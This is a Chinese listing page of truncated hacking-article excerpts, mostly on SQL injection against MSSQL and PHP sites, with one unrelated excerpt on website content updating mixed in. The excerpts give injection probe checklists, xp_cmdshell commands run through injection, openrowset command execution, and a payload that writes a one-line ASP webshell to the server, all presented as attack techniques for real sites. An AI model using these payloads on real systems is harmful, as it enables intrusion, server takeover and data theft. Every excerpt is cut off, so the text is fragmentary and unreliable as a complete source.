我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错： exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目录win,指向c:\winnt\sy...

本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注入漏洞的,所以一切后果与我以及BCT小组无关 最近无聊，在网上走来走去看看。发现现在的整站系统可是越来越多了，修改版本等等的N多阿！而蓝雨设计整站的使用者也越来越多了，蓝雨整站系统是从NOWA 0.94修改而来的！基于NOWA的系统不单指蓝雨一个还有很多的！我在此就不一一列举了，核心都是一样，只是程序的附加功能就各自不同！安全方面因为基于NOWA的系统所以到目前知道的漏洞就只有...

下面我要谈到一些Sqlserver新的Bug，虽然本人经过长时间的努力，当然也有点幸运的成分在内，才得以发现，不敢一个人独享，拿出来请大家鉴别。 1．关于Openrowset和Opendatasource 可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： select * from openrowset(’sqloledb’,’myserver’;’sa’;’’,’select * from table’) 可见（即使从字面意义上...

一个网站，能算上优秀，起码应该做到内容更新及时，质量上乘。作为一个普通的站长，基本都是一个人单干，没有专门的网站编辑。自己寻找内容自己更新，基本都是Ctrl+C与Ctrl+V相结合(虽说男女搭配干活不累，但是C与V貌似兄妹)，这样的活儿干久了还是让人厌烦的。    即使你每天忙于更新网站内容，但是你是否觉得你的网站总是更在某些甚至连自己都看不上眼的小站后面呢？即使你每天关注其他相同类型的网站，也难免有自己漏网之鱼呢？    我很明白许多人为此苦恼，那么是否该为此想一些好的办法来解决呢？也许大部分人会否定，能怎么想办...

1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.注入参数是字符’and [查询条件] and ’’=’4.搜索时没过滤参数的’and [查询条件] and ’%25’=’5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjec...

 1、   用^转义字符来写ASP(一句话木马)文件的方法:?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell ’echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp’;-- ? &nb...

php注入实例在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期，下面说说我的休会吧,希望能抛砖引玉!相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sqlnjection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:在viewforum.php中有一个变量没过滤:if(isset($HTTP_GET_VARS<pOS...

[code]1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符 ’and [查询条件] and ’’=’ 4.搜索时没过滤参数的 ’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0&...

Rem ## 长整数转换 Function toNum(s, default) If IsNumeric(s) and s <> "" then toNum = CLng(s) Else toNum = default End If End Function Rem ## SQL 语句转换 Function...

一些sql扩展 xp_regaddmultistring xp_regdeletekey 删除键名 xp_regdeletevalue 删除键值 xp_regenumkeys 枚举 xp_regenumvalues xp_regread 对于 xp_regremovemultistring xp_regwrite 写 xp_availablemedia 查看驱动器 xp_dirtree 看目录 xp_enumdsn&...

1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符’and [查询条件] and ’’=’4.搜索时没过滤参数的’and [查询条件] and ’%25’=’5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from&nb...